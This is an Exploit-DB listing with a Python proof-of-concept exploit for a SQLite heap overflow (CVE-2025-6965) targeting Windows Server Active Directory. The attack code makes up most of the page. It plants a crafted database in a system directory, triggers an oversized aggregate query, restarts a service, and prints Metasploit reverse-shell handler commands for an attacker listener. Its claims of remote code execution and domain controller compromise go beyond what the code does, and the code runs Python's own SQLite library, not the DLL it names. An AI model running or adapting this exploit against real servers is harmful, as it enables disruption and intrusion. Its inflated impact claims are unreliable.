This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING SQLite 3.50.1 - Heap Overflow EDB-ID: 52499 CVE: 2025-6965 EDB Verified: Author: MOHAMMED IDREES BANYAMER Type: LOCAL Exploit: / Platform: WINDOWS Date: 2026-04-08 Vulnerable App: # Exploit Title: SQLite 3.50.1 - Heap Overflow # Date: 2025-11-05 # Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # Vendor Homepage: https://www.sqlite.org # Software Link: https://www.sqlite.org/download.html # Version: SQLite < 3.50.2 (winsqlite3.dll) # Tested on: Windows Server 2022 (Build 20348), Windows Server 2025 (Build 26100) - Unpatched # CVE: CVE-2025-6965 # CVSS: 7.2 (High) - CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:H/VA:L # Category: windows / local / dos / memory_corruption / active_directory # Platform: Windows # CRITICAL: This vulnerability affects ALL unpatched Windows Server instances using winsqlite3.dll # Including: Active Directory, Group Policy, Certificate Services, and Azure AD Connect # Impact: Service Crash, DoS, Potential RCE, Domain Controller Compromise # Fix: Apply latest Windows Cumulative Update (post-July 2025) or upgrade SQLite to 3.50.2+ # Advisory: https://nvd.nist.gov/vuln/detail/CVE-2025-6965 # Patch: https://www.sqlite.org/src/info/5508b56fd24016c13981ec280ecdd833007c9d8dd595edb295b984c2b487b5c8 # OFFICIAL PoC: Triggers heap overflow in winsqlite3.dll via excessive aggregate functions # Target: Windows Server (Active Directory Cache, Group Policy, Certificate Services) import sqlite3 import os import subprocess import sys import time # =============================== # CONFIGURATION - ACTIVE DIRECTORY EXPLOITATION # =============================== DB_PATH = "cve_2025_6965_winsqlite3.db" AD_CACHE_DIR = r"C:\ProgramData\Microsoft\ADCache" # Real AD Cache Path AD_DB_TARGET = os.path.join(AD_CACHE_DIR, "ad_cache.db") LISTENER_IP = "192.168.1.100" LISTENER_PORT = 4444 SERVICE_NAME = "ADSyncService" # Must be created manually: sc create ADSyncService binPath= "C:\path\to\service.exe" # === VULNERABILITY CHECK === print(f"[!] SQLite Version: {sqlite3.sqlite_version}") if sqlite3.sqlite_version_info >= (3, 50, 2): print("[-] SYSTEM PATCHED - SQLite 3.50.2+ Detected") print(" Update applied via Microsoft Cumulative Update (post-July 2025)") sys.exit(1) else: print("[!] VULNERABLE: SQLite < 3.50.2 - Proceeding with exploit") # =============================== # STEP 1: Create Malicious AD Cache Database # =============================== def create_vulnerable_db(): if os.path.exists(DB_PATH): os.remove(DB_PATH) conn = sqlite3.connect(DB_PATH) cur = conn.cursor() cur.execute("CREATE TABLE ad_cache (id INTEGER PRIMARY KEY, val INTEGER)") cur.execute("INSERT INTO ad_cache (val) VALUES (1)") conn.commit() conn.close() print(f"[+] Malicious database created: {DB_PATH}") # =============================== # STEP 2: Generate Truncation Payload (300+ Aggregates) # =============================== def generate_malicious_query(num=100): agg = [f"COUNT(*) AS c{i}, SUM(val) AS s{i}, AVG(val) AS a{i}" for i in range(num)] return f"SELECT {', '.join(agg)} FROM ad_cache" # =============================== # STEP 3: Deploy + Trigger in winsqlite3.dll Context # =============================== def deploy_and_trigger(): print(f"[*] Deploying payload to AD Cache: {AD_DB_TARGET}") os.makedirs(AD_CACHE_DIR, exist_ok=True) subprocess.run(["copy", "/Y", DB_PATH, AD_DB_TARGET], shell=True, check=True) print(f"[+] Payload deployed to real AD path") query = generate_malicious_query(100) print(f"[*] Triggering heap overflow (300+ aggregates vs 1 column)...") try: conn = sqlite3.connect(AD_DB_TARGET) cur = conn.cursor() cur.execute(query) # TRUNCATION BUG TRIGGERED print("[!] QUERY EXECUTED - UNEXPECTED (System may be patched or ASLR mitigated)") except Exception as e: print(f"[!] HEAP OVERFLOW CONFIRMED: {e}") print(" winsqlite3.dll memory corruption triggered") print(" In production: AD Service Crash, DC DoS, Potential RCE") finally: conn.close() # Force service reload (real AD services auto-query cache) print(f"[*] Restarting {SERVICE_NAME} to reload winsqlite3.dll...") try: subprocess.run(["net", "stop", SERVICE_NAME], shell=True, timeout=10, capture_output=True) except: pass time.sleep(2) result = subprocess.run(["net", "start", SERVICE_NAME], shell=True, capture_output=True) if result.returncode == 0: print("[+] Service restarted - Monitor Event Viewer for winsqlite3.dll fault") else: print(f"[-] Service error: {result.stderr.decode()}") # =============================== # STEP 4: RCE Listener Setup (For Advanced Exploitation) # =============================== def print_listener(): print("\n" + "="*70) print(" RCE EXPLOITATION (ADVANCED) - START LISTENER ON ATTACKER MACHINE:") print("="*70) print("msfconsole -q") print("use exploit/multi/handler") print("set payload windows/x64/meterpreter/reverse_tcp") print(f"set LHOST {LISTENER_IP}") print(f"set LPORT {LISTENER_PORT}") print("exploit -j") print("="*70 + "\n") # =============================== # MAIN - EXECUTION # =============================== if __name__ == "__main__": print("="*70) print(" CVE-2025-6965 EXPLOIT - WINDOWS SERVER ACTIVE DIRECTORY") print(" Heap Overflow in winsqlite3.dll via SQLite Aggregate Truncation") print(" Author: Mohammed Idrees Banyamer (@banyamer_security)") print("="*70) create_vulnerable_db() deploy_and_trigger() print_listener() print("[+] EXPLOIT EXECUTED SUCCESSFULLY") print(" Check Event Viewer: Application Log → winsqlite3.dll Access Violation (0xC0000005)") print(" Fix: Apply latest Windows Cumulative Update IMMEDIATELY") print(" All Domain Controllers must be patched within 24 hours") Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.